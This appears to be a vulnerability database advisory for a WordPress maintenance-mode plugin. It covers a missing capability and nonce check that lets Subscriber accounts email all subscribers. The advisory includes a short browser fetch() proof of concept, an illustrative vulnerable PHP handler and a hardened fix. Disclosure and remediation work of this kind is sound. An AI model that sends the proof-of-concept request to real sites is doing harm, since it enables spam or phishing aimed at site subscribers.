WordPress Plugin Vulnerabilities
Coming soon and Maintenance mode < 3.6.7 - Subscriber+ Arbitrary Email Sending to Subscribed Users
Description
The plugin does not perform authorisation or CSRF (nonce) checks in its coming_soon_send_mail AJAX action (reachable through wp-admin/admin-ajax.php), allowing any authenticated user, with a role as low as Subscriber, to send arbitrary emails to all subscribed users.
Proof of Concept
// Run from the browser console while logged in as a Subscriber (or any other role).
// The "massage_*" parameter names are the ones the plugin reads; they are not typos here.
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": { "content-type": "application/x-www-form-urlencoded" },
  "body": "action=coming_soon_send_mail&massage_title=title&massage_description=description&massage_from_name=from&massage_from_mail=from@example.com",
  "method": "POST",
  "credentials": "include"   // attach the logged-in session cookies
}).then(response => response.text())
  .then(data => console.log(data));
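The following is an added illustration of the vulnerable pattern and its fix; it is not the plugin's own code. Only the AJAX action name and the massage_* POST parameter names come from the advisory; the function names, the csmm_ prefix, the manage_options capability choice and the csmm_subscribers option used to look up recipients are assumptions.

```php
<?php
// Added example, not code from the Coming soon and Maintenance mode plugin.
// Assumed: the subscriber list lives in a plugin option; adapt to the real storage.
function csmm_get_subscriber_emails() {
    return (array) get_option( 'csmm_subscribers', array() );
}

// VULNERABLE PATTERN: the callback is only reachable by logged-in users
// (wp_ajax_ prefix, no wp_ajax_nopriv_), but it never checks the caller's
// capability or a nonce, so any Subscriber, or a CSRF page they visit, can mail everyone.
// add_action( 'wp_ajax_coming_soon_send_mail', 'csmm_send_mail_unchecked' );
function csmm_send_mail_unchecked() {
    $headers = array( 'From: ' . $_POST['massage_from_name'] . ' <' . $_POST['massage_from_mail'] . '>' );
    foreach ( csmm_get_subscriber_emails() as $to ) {
        wp_mail( $to, $_POST['massage_title'], $_POST['massage_description'], $headers );
    }
    wp_die();
}

// HARDENED PATTERN: CSRF check, authorisation check, then input sanitisation.
add_action( 'wp_ajax_coming_soon_send_mail', 'csmm_send_mail_checked' );
function csmm_send_mail_checked() {
    // Verifies the nonce in $_POST['nonce'] for the 'csmm_send_mail' action and dies on failure.
    check_ajax_referer( 'csmm_send_mail', 'nonce' );

    // Only site administrators (manage_options) may mail the subscriber list.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $subject   = sanitize_text_field( wp_unslash( $_POST['massage_title'] ?? '' ) );
    $body      = wp_kses_post( wp_unslash( $_POST['massage_description'] ?? '' ) );
    // sanitize_text_field() and sanitize_email() both strip line breaks,
    // so nothing can smuggle extra lines into the From: header.
    $from_name = sanitize_text_field( wp_unslash( $_POST['massage_from_name'] ?? '' ) );
    $from_mail = sanitize_email( wp_unslash( $_POST['massage_from_mail'] ?? '' ) );

    if ( '' === $subject || ! is_email( $from_mail ) ) {
        wp_send_json_error( 'invalid input', 400 );
    }

    $headers = array( 'From: ' . $from_name . ' <' . $from_mail . '>' );
    $sent    = 0;
    foreach ( csmm_get_subscriber_emails() as $to ) {
        if ( wp_mail( $to, $subject, $body, $headers ) ) {
            $sent++;
        }
    }
    wp_send_json_success( array( 'sent' => $sent ) );
}

// The admin page's script needs the nonce; wp_localize_script() is the usual way to pass it.
// 'csmm-admin' is an assumed script handle registered elsewhere by the plugin.
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'csmm-admin', 'csmmAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'csmm_send_mail' ),
    ) );
} );
```

With the hardened handler in place, the proof-of-concept request above fails twice over: it carries no nonce, so check_ajax_referer() ends the request before any code runs, and even a forged nonce would not help a Subscriber, who lacks manage_options. Note that the nonce alone is not a substitute for the capability check: a nonce only proves the request came from a page the site served to that same user, which a Subscriber can still obtain.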
Classification
Type
NO AUTHORISATION
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Verified
Yes
Timeline
Publicly Published
2022-01-24
Added
2022-01-24
Last Updated
2023-07-24